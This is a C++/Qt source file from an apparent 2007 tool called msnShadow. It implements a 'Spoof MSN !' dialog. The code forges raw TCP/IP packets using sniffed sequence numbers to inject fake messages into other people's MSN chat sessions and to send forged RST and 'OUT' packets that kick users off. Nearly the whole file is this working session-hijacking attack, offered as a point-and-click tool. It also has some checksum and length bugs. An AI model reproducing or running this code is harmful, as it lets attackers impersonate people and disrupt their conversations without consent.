/***************************************************************************
 *   Copyright (C) 2007 by Gabriel Menezes Nunes   *
 *   gabriel@msnshadow   *
 *                                                                         *
 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 *                                                                         *
 *   This program is distributed in the hope that it will be useful,       *
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
 *   GNU General Public License for more details.                          *
 *                                                                         *
 *   You should have received a copy of the GNU General Public License     *
 *   along with this program; if not, write to the                         *
 *   Free Software Foundation, Inc.,                                       *
 *   59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.             *
 ***************************************************************************/

#include "spoofdlg.h"

#include <qvariant.h>
#include <qlabel.h>
#include <qtextedit.h>
#include <qpushbutton.h>
#include <qbuttongroup.h>
#include <qradiobutton.h>
#include <qlayout.h>
#include <qtooltip.h>
#include <qwhatsthis.h>

#define __USE_BSD
#include <stdio.h>
#define __FAVOR_BSD
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/if_ether.h>

/*
 *  Constructs a spoofDlg as a child of 'parent', with the
 *  name 'name' and widget flags set to 'f'.
 *
 *  The dialog will by default be modeless, unless you set 'modal' to
 *  TRUE to construct a modal dialog.
 */
spoofDlg::spoofDlg( QWidget* parent, msnShadowItemChat *_chat, int _id, const char* name, bool modal, WFlags fl )
    : QDialog( parent, name, modal, fl ), id(_id)
{
    if ( !name )
	setName( "spoofDlg" );

    textLabel1 = new QLabel( this, "textLabel1" );
    textLabel1->setGeometry( QRect( 60, 20, 480, 20 ) );

    textEdit1 = new QTextEdit( this, "textEdit1" );
    textEdit1->setGeometry( QRect( 50, 50, 520, 150 ) );

    pushButton2 = new QPushButton( this, "pushButton2" );
    pushButton2->setGeometry( QRect( 390, 270, 110, 24 ) );

    pushButton1 = new QPushButton( this, "pushButton1" );
    pushButton1->setGeometry( QRect( 120, 270, 100, 24 ) );

    buttonGroup1 = new QButtonGroup( this, "buttonGroup1" );
    buttonGroup1->setGeometry( QRect( 120, 210, 360, 50 ) );

    radioButton1 = new QRadioButton( buttonGroup1, "radioButton1" );
    radioButton1->setGeometry( QRect( 30, 20, 154, 20 ) );

    radioButton2 = new QRadioButton( buttonGroup1, "radioButton2" );
	connect(pushButton1, SIGNAL(clicked()), this, SLOT(spoof()));
	connect(pushButton2, SIGNAL(clicked()), this, SLOT(close()));
    radioButton2->setGeometry( QRect( 200, 20, 154, 20 ) );
    languageChange();
    resize( QSize(600, 321).expandedTo(minimumSizeHint()) );
    clearWState( WState_Polished );
	chat = _chat;
	radioButton1->setText(chat->ip1.ascii());
	radioButton2->setText(chat->ip2.ascii());
}

/*
 *  Destroys the object and frees any allocated resources
 */
spoofDlg::~spoofDlg()
{
    // no need to delete child widgets, Qt does it all for us
}

void spoofDlg::spoof() {

struct ip *ip, *pcap_ip, *ip_out;
	struct tcphdr *tcp, *pcap_tcp, *tcp_out;
	struct pseudo_header *pseudo, *pseudo_out;
struct in_addr saddr, daddr;
unsigned int packet_size, packet_size_out;
char OUT[] = "OUT\r\n";
char msnHeader[1024];
char *packet, *packet_out;
struct sockaddr_in raw;

struct pseudo_header {
	unsigned long s_addr;
	unsigned long d_addr;
	char zero;
	unsigned char protocol;
	unsigned short length;
};

if(radioButton1->isChecked()) {
	if(chat->isLan1)
	sprintf(msnHeader, "MSG %d A %d\r\nMIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\nX-MMS-IM-Format: FN=Helvetica; EF=; CO=000000; CS=0; PF=22\r\n\r\n%s", chat->numberMsg1, textEdit1->text().length() + 122, textEdit1->text().ascii());
	else
	sprintf(msnHeader, "MSG %s %s %d\r\nMIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\nX-MMS-IM-Format: FN=Helvetica; EF=; CO=000000; CS=0; PF=22\r\n\r\n%s", chat->isLanEmail1.ascii(), chat->isLanString1.ascii(), textEdit1->text().length() + 122, textEdit1->text().ascii());

}
else {
	if(chat->isLan2)
	sprintf(msnHeader, "MSG %d A %d\r\nMIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\nX-MMS-IM-Format: FN=Helvetica; EF=; CO=000000; CS=0; PF=22\r\n\r\n%s", chat->numberMsg2, textEdit1->text().length() + 122, textEdit1->text().ascii());
	else
	sprintf(msnHeader, "MSG %s %s %d\r\nMIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\nX-MMS-IM-Format: FN=Helvetica; EF=; CO=000000; CS=0; PF=22\r\n\r\n%s", chat->isLanEmail2.ascii(), chat->isLanString2.ascii(), textEdit1->text().length() + 122, textEdit1->text().ascii());
}


packet_size = (sizeof(struct tcphdr) + sizeof(struct ip) + strlen(msnHeader));
packet_size_out = (sizeof(struct tcphdr) + sizeof(struct ip) + strlen(OUT));
       

	
	packet = (char *)malloc(packet_size);
        packet_out = (char*)malloc(packet_size_out);

	
	ip = (struct ip *)packet;
        ip_out = (struct ip*) packet_out;
	pseudo = (struct pseudo_header *)(packet + sizeof(struct ip) - sizeof(struct pseudo_header));
        pseudo_out = (struct pseudo_header *)(packet_out + sizeof(struct ip) - sizeof(struct pseudo_header));
	tcp = (struct tcphdr *)(packet + sizeof(struct ip));
        tcp_out = (struct tcphdr *)(packet_out + sizeof(struct ip));
	memcpy((packet+sizeof(struct ip)+sizeof(struct tcphdr)), msnHeader, strlen(msnHeader));
 memcpy((packet_out+sizeof(struct ip) + sizeof(struct tcphdr)), OUT, strlen(OUT));
	memset(packet, 0x00, (sizeof(struct ip) + sizeof(struct tcphdr)));
 memset(packet_out, 0x00, (sizeof(struct ip) + sizeof(struct tcphdr)));
if(radioButton1->isChecked()){
	saddr.s_addr = inet_addr(chat->ip1.ascii());
	daddr.s_addr = inet_addr(chat->ip2.ascii());
}
else {
	saddr.s_addr = inet_addr(chat->ip2.ascii());
	daddr.s_addr = inet_addr(chat->ip1.ascii());
}
	
	
if(radioButton1->isChecked()) {
	pseudo->s_addr = inet_addr(chat->ip1.ascii());
	pseudo->d_addr = inet_addr(chat->ip2.ascii());
 pseudo_out->s_addr = inet_addr(chat->ip1.ascii());
 pseudo_out->d_addr = inet_addr(chat->ip2.ascii());
}
else {
pseudo->s_addr = inet_addr(chat->ip2.ascii());
	pseudo->d_addr = inet_addr(chat->ip1.ascii());
 pseudo_out->s_addr = inet_addr(chat->ip2.ascii());
 pseudo_out->d_addr = inet_addr(chat->ip1.ascii());
}


	
        pseudo->length = htons(sizeof(struct tcphdr) + strlen(msnHeader));
        pseudo_out->length = htons(sizeof(struct tcphdr) + strlen(OUT));
	pseudo->protocol = IPPROTO_TCP;
 pseudo_out->protocol = IPPROTO_TCP;
	
	

	int sock;
	if( (sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
		perror("Socket");
		return;
	}

	int on = 1;

	if ( (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0 ){
		perror("Setsockopt");
		return;
	}
	memset((char *)tcp, 0x00, sizeof(struct tcphdr));
        memset((char *)tcp_out, 0x00, sizeof(struct tcphdr));
	
	if(radioButton1->isChecked()){
	tcp->th_sport = htons(chat->port1);
	tcp->th_dport = htons(chat->port2);
	tcp->th_seq = htonl(chat->seq1);
	tcp->th_ack = htonl(chat->ack1);
	
}
	else {
tcp->th_sport = htons(chat->port2);
	tcp->th_dport = htons(chat->port1);
	tcp->th_seq = htonl(chat->seq2);
	tcp->th_ack = htonl(chat->ack2);
	
}
	tcp->th_off = 5;
	tcp->th_flags = TH_PUSH | TH_ACK;
	tcp->th_win = htons(12000);
	tcp->th_sum = 0;
	tcp->th_sum = in_cksum((unsigned short *)pseudo, sizeof(struct tcphdr) + sizeof(struct pseudo_header) + strlen(msnHeader));
if(radioButton1->isChecked()){
 tcp_out->th_sport = htons(chat->port1);
 tcp_out->th_dport = htons(chat->port2);
 tcp_out->th_seq = htonl(chat->seq1 + strlen(msnHeader));
 tcp_out->th_ack = htonl(chat->ack1);
}
else {
tcp_out->th_sport = htons(chat->port2);
 tcp_out->th_dport = htons(chat->port1);
 tcp_out->th_seq = htonl(chat->seq2 + strlen(msnHeader));
 tcp_out->th_ack = htonl(chat->ack2);
}
 tcp_out->th_off = 5;
 tcp_out->th_flags = TH_RST; ///TH_PUSH | TH_ACK;
 tcp_out->th_win = htons(12000);
 tcp_out->th_sum = 0;
 tcp_out->th_sum = in_cksum((unsigned short *)pseudo_out, sizeof(struct tcphdr) + sizeof(struct pseudo_header) + strlen(OUT));

	memset(packet, 0x00, sizeof(struct ip));
 memset(packet_out, 0x00, sizeof(struct ip));

	ip->ip_v = 4;
	ip->ip_hl = 5;
	ip->ip_len = packet_size;
	ip->ip_off = 0;
	ip->ip_ttl = 255;
	ip->ip_p = IPPROTO_TCP;
	ip->ip_src = saddr;
	ip->ip_dst = daddr;
	ip->ip_sum = (unsigned short)in_cksum((unsigned short *)ip, sizeof(struct ip));
 ip_out->ip_v = 4;
 ip_out->ip_hl = 5;
 ip_out->ip_len = packet_size;
 ip_out->ip_off = 0;
 ip_out->ip_ttl = 255;
 ip_out->ip_p = IPPROTO_TCP;
 ip_out->ip_src = saddr;
 ip_out->ip_dst = daddr;
 ip_out->ip_sum = (unsigned short)in_cksum((unsigned short *)ip, sizeof(struct ip));
	
	
	raw.sin_family = AF_INET;
	
	if(radioButton1->isChecked()){
	raw.sin_port = htons(chat->port2);
	raw.sin_addr.s_addr = inet_addr((chat->ip2.ascii()));
}
	else{
	raw.sin_port = htons(chat->port1);
	raw.sin_addr.s_addr = inet_addr(chat->ip1.ascii());
}


	sendto(sock, packet, packet_size, 0x00, (struct sockaddr *)&raw, sizeof(raw));
	
 sendto(sock, packet_out, packet_size_out, 0x00, (struct sockaddr *)&raw, sizeof(raw));
 
close();
        
}

void spoofDlg::kickUser()  {
struct pseudo_header {
	unsigned long s_addr;
	unsigned long d_addr;
	char zero;
	unsigned char protocol;
	unsigned short length;
};
char OUT[] = "OUT\r\n";
int packet_size_out = (sizeof(struct tcphdr) + sizeof(struct ip) + strlen(OUT));
char *packet_out = (char*)malloc(packet_size_out);

        struct ip *ip_out = (struct ip*) packet_out;
	
        struct pseudo_header *pseudo_out = (struct pseudo_header *)(packet_out + sizeof(struct ip) - sizeof(struct pseudo_header));
	
        struct tcphdr *tcp_out = (struct tcphdr *)(packet_out + sizeof(struct ip));
	memcpy((packet_out+sizeof(struct ip) + sizeof(struct tcphdr)), OUT, strlen(OUT));
	memset(packet_out, 0x00, (sizeof(struct ip) + sizeof(struct tcphdr)));
struct in_addr saddr, daddr;
	if(chat->ip1.isEmpty() || chat->serverIp1.isEmpty() || chat->serverIp1.isNull() || chat->ip1.isNull()){
		
		close();
		return;
}

 saddr.s_addr = inet_addr(chat->ip1.ascii());


 daddr.s_addr = inet_addr(chat->serverIp1.ascii());

pseudo_out->s_addr = inet_addr(chat->ip1.ascii());

 pseudo_out->d_addr = inet_addr(chat->serverIp1.ascii());

pseudo_out->length = htons(sizeof(struct tcphdr) + strlen(OUT));
	pseudo_out->protocol = IPPROTO_TCP;
int sock;
	if( (sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
		perror("Socket");
		return;
	}

	int on = 1;

	if ( (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0 ){
		perror("Setsockopt");
		return;
	}
	memset((char *)tcp_out, 0x00, sizeof(struct tcphdr));
	tcp_out->th_sport = htons(chat->clientPort1);
 tcp_out->th_dport = htons(chat->serverPort1);
 tcp_out->th_seq = htonl(chat->seqServer1);
 tcp_out->th_ack = htonl(chat->ackServer1);
tcp_out->th_off = 5;
 tcp_out->th_flags = TH_PUSH | TH_ACK;
 tcp_out->th_win = htons(12000);
 tcp_out->th_sum = 0;
 tcp_out->th_sum = in_cksum((unsigned short *)pseudo_out, sizeof(struct tcphdr) + sizeof(struct pseudo_header) + strlen(OUT));

	
 memset(packet_out, 0x00, sizeof(struct ip));
ip_out->ip_v = 4;
 ip_out->ip_hl = 5;
 ip_out->ip_len = packet_size_out;
 ip_out->ip_off = 0;
 ip_out->ip_ttl = 255;
 ip_out->ip_p = IPPROTO_TCP;
 ip_out->ip_src = saddr;
 ip_out->ip_dst = daddr;
unsigned short *caralho;
int merda;
 ip_out->ip_sum = in_cksum((unsigned short*)ip_out, sizeof(struct ip));
	
	struct sockaddr_in raw;
	raw.sin_family = AF_INET;
	raw.sin_port = htons(chat->serverPort1);
	raw.sin_addr.s_addr = inet_addr((chat->serverIp1.ascii()));
	sendto(sock, packet_out, packet_size_out, 0x00, (struct sockaddr *)&raw, sizeof(raw));


}


unsigned short  spoofDlg::in_cksum(unsigned short *addr, int len) {
	register int sum = 0;
	u_short answer = 0;
	register u_short *w = addr;
	register int nleft = len;

	while(nleft > 1) {
		sum += *w++;
		nleft -= 2;
	}

	if(nleft == 1) {
		*(u_char *)(&answer) = *(u_char *)w;
		sum += answer;
	}

	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	answer = ~sum;
	return answer;
}
/*
 *  Sets the strings of the subwidgets using the current
 *  language.
 */
void spoofDlg::languageChange()
{
    setCaption( tr( "Spoof MSN !" ) );
    textLabel1->setText( tr( "<b>Type the spoof message and choose de target which will be spoofed...</b>" ) );
    pushButton2->setText( tr( "Cancel" ) );
    pushButton1->setText( tr( "Spoof!" ) );
    buttonGroup1->setTitle( tr( "Hosts" ) );
    radioButton1->setText( tr( "radioButton1" ) );
    radioButton2->setText( tr( "radioButton2" ) );
}

